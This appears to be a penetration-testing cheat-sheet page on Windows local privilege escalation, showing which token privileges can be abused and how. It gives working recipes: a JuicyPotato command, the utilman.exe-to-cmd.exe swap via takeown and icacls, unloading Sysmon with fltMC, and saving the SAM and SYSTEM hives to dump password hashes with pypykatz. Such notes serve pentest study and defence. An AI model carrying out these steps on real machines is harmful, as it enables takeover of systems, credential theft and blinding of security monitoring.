PRIVILEGES INFORMATION

Privilege Impact Tool Execution path Remarks

Privilege	Impact	Tool	Execution path	Remarks
`SeAssignPrimaryToken`	Admin	3rd party tool	"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"	Thank you Aurélien Chalot for the update. I will try to re-phrase it to something more recipe-like soon.
`SeBackup`	Threat	Built-in commands	Read sensitve files with `robocopy /b`	- May be more interesting if you can read %WINDIR%\MEMORY.DMP - `SeBackupPrivilege` (and robocopy) is not helpful when it comes to open files. - Robocopy requires both SeBackup and SeRestore to work with /b parameter.
`SeCreateToken`	Admin	3rd party tool	Create arbitrary token including local admin rights with `NtCreateToken`.
`SeDebug`	Admin	PowerShell	Duplicate the `lsass.exe` token.	Script to be found at FuzzySecurity
`SeLoadDriver`	Admin	3rd party tool	1. Load buggy kernel driver such as `szkg64.sys` or `capcom.sys` 2. Exploit the driver vulnerability Alternatively, the privilege may be used to unload security-related drivers with `ftlMC` builtin command. i.e.: `fltMC sysmondrv`	1. The `szkg64` vulnerability is listed as CVE-2018-15732 2. The `szkg64` exploit code was created by Parvez Anwar
`SeRestore`	Admin	PowerShell	1. Launch PowerShell/ISE with the SeRestore privilege present. 2. Enable the privilege with Enable-SeRestorePrivilege). 3. Rename utilman.exe to utilman.old 4. Rename cmd.exe to utilman.exe 5. Lock the console and press Win+U	Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.
`SeTakeOwnership`	Admin	Built-in commands	1. `takeown.exe /f "%windir%\system32"` 2. `icalcs.exe "%windir%\system32" /grant "%username%":F` 3. Rename cmd.exe to utilman.exe 4. Lock the console and press Win+U	Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.
`SeTcb`	Admin	3rd party tool	Manipulate tokens to have local admin rights included. May require SeImpersonate. To be verified.

SeAssignPrimaryToken

Admin

3rd party tool

"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"

Thank you Aurélien Chalot for the update. I will try to re-phrase it to something more recipe-like soon.

SeBackup

Threat

Built-in commands

Read sensitve files with robocopy /b

- May be more interesting if you can read %WINDIR%\MEMORY.DMP - SeBackupPrivilege (and robocopy) is not helpful when it comes to open files. - Robocopy requires both SeBackup and SeRestore to work with /b parameter.

SeCreateToken

Admin

3rd party tool

Create arbitrary token including local admin rights with NtCreateToken.

SeDebug

Admin

PowerShell

Duplicate the lsass.exe token.

Script to be found at FuzzySecurity

SeLoadDriver

Admin

3rd party tool

1. Load buggy kernel driver such as szkg64.sys or capcom.sys 2. Exploit the driver vulnerability Alternatively, the privilege may be used to unload security-related drivers with ftlMC builtin command. i.e.: fltMC sysmondrv

1. The szkg64 vulnerability is listed as CVE-2018-15732 2. The szkg64 exploit code was created by Parvez Anwar

SeRestore

Admin

PowerShell

1. Launch PowerShell/ISE with the SeRestore privilege present. 2. Enable the privilege with Enable-SeRestorePrivilege). 3. Rename utilman.exe to utilman.old 4. Rename cmd.exe to utilman.exe 5. Lock the console and press Win+U

Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.

SeTakeOwnership

Admin

Built-in commands

1. takeown.exe /f "%windir%\system32" 2. icalcs.exe "%windir%\system32" /grant "%username%":F 3. Rename cmd.exe to utilman.exe 4. Lock the console and press Win+U

Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.

SeTcb

Admin

3rd party tool

Manipulate tokens to have local admin rights included. May require SeImpersonate. To be verified.

Exploitation Of Each Privilege Mention Above =>

SeAssignPrimaryToken/SeImpersonatePrivilege:

Get Juicy Potato on the victim machine And get a CLSIDfor potatoes.

Command to execute a script through a privileged user.

.\JuicyPotato.exe -t * -p c:\path\to\executable.bat -l 9002 -c '{CLSID}'

SeBackup:

cd c:\ mkdir Temp reg save hklm\sam c:\Temp\sam reg save hklm\system c:\Temp\system

Download The Files And use pyptkatz to dump hashes

pypykatz registry --sam sam system

PreviousLocal Privilege Escalation NextOpen Ports

Last updated 2 years ago